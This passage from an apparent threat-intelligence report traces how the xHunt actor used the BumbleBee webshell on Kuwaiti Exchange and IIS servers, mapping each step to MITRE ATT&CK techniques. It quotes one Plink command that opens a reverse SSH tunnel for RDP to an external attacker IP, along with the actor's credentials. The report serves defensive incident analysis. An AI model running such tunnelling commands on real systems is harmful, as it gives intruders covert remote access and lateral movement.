Commands Executed via BumbleBee
As we previously mentioned, the compromised Exchange server of a Kuwaiti organization does not
log the POST data within the IIS logs, so we were unable to extract the commands run on the
BumbleBee webshell. However, we used overlapping timestamps to correlate the activity in the IIS
logs with the command prompt activity seen in Cortex XDR logs to determine the commands
executed on the server. Unfortunately, we did not have visibility into the commands executed on
BumbleBee until Sept. 16, 2020, when Cortex XDR was installed on the compromised Exchange
server in response to the suspicious activity. We were also able to determine the commands run on
the BumbleBee webshell hosted on the internal IIS web server at one of the two other Kuwaiti
organizations as well.
Based on the Cortex XDR logs, the actor spent three hours and 37 minutes on Sept. 16, 2020,
running commands via the BumbleBee webshell installed on the compromised Exchange server.
Table 2 in the Appendix shows all the commands and the MITRE ATT&CK technique identifiers that
best describe the activities carried out. The commands show the actor:
1. Performing network discovery (T1018) using ping and net group commands, as well as
PowerShell (T1059.001), to find additional computers on the network.
2. Performing account discovery (T1087) using the whoami and quser commands.
3. Determining the system time (T1124) using the W32tm and time commands.
4. Creating an SSH tunnel (T1572) using Plink (RTQ.exe) to a remote host.
5. Using RDP (T1021.001) over the SSH tunnel to control the compromised computer.
6. Laterally moving (T1570) to another system by mounting a shared folder, copying Plink
(RTQ.exe) to a remote system and using Windows Management Instrumentation (WMI)
(T1047) to create an SSH tunnel for RDP access.
7. Removing evidence of their presence by deleting (T1070.004) BumbleBee after they were done
issuing commands.
The commands listed in Table 2 in the Appendix also show the actor using Plink (RTQ.exe) to create
an SSH tunnel to an external IP address 192.119.110[.]194, as seen in the following command:
echo y | c:\windows\temp\RTQ.exe 192.119.110[.]194 -C -R 0.0.0.0:8081::3389 -l
bor -pw 123321 -P 443
The IP address overlaps with other related infrastructure that we will discuss in a later section of this
blog. Most importantly, the username and password of bor and 123321 used to create the SSH
tunnel overlaps directly with prior xHunt activity. These exact credentials were listed within the
5/18
cheat sheet found within the Sakabota tool, which provided an example command that the actor
could use to create SSH tunnels using Plink. We believe the actor used the example command from
the cheat sheet as a basis for the commands they used to create the SSH tunnels via BumbleBee.
The actor creates these SSH tunnels to connect to non-internet accessible RDP services on the
Windows system, specifically to use RDP to interact with the compromised system and to use
Graphical User Interface (GUI) applications. The actor also uses these SSH tunnels to move laterally
to other systems on the network, specifically to access internal systems that are not remotely
accessible from the internet, as depicted in Figure 2.
Figure 2. Visualization of xHunt actor accessing an internal system from an SSH tunnel created on the internet
accessible server hosting BumbleBee.
In addition to analyzing commands executed on the compromised Exchange server, we also
analyzed the commands executed on the BumbleBee webshell at an internal IIS web server hosted at
one of the two other Kuwaiti organizations. On Sept. 10, 2020, we found that the actor ran several
commands to perform network and user account discovery. Additionally, the actor used BumbleBee
to upload a second webshell with a filename of cq.aspx. The actor used this second webshell to run a
PowerShell script that issued SQL queries to a Microsoft SQL Server database.
The actor first issued a SQL query to check the version of SQL server, followed by the actor issuing
two additional queries that were very specific to the web application running on the IIS web server.
The PowerShell script used to issue the SQL queries is very similar to scripts that were included in a
Microsoft Technet forum post titled Running SQL via PowerShell, which suggests the actor may
have used this forum post as a basis for the PowerShell script. We were unable to obtain the second
webshell, as the actor deleted it via the BumbleBee webshell when they were finished. Table 3 in the
Appendix shows the commands executed via BumbleBee on Sept. 10, 2020.
The logs on the IIS web server hosting the BumbleBee webshell used to issue the commands in Table
3 only included internal IP addresses for the source of the activity. The internal IP addresses
suggested this web server was not publicly accessible and did not expose the actor’s source IP
address. However, all of the attempts to access BumbleBee and run the commands in Table 3 had
192.119.110[.]194:8083 as the host in the URL of the referrer field within the web server logs. This
external IP address in the referrer field suggests that the actor was accessing BumbleBee via an SSH
tunnel. The IP address in the referrer field is also the same as in the command issued to create the
SSH tunnels for RDP access that we observed on the compromised Exchange server, as shown in
Table 2.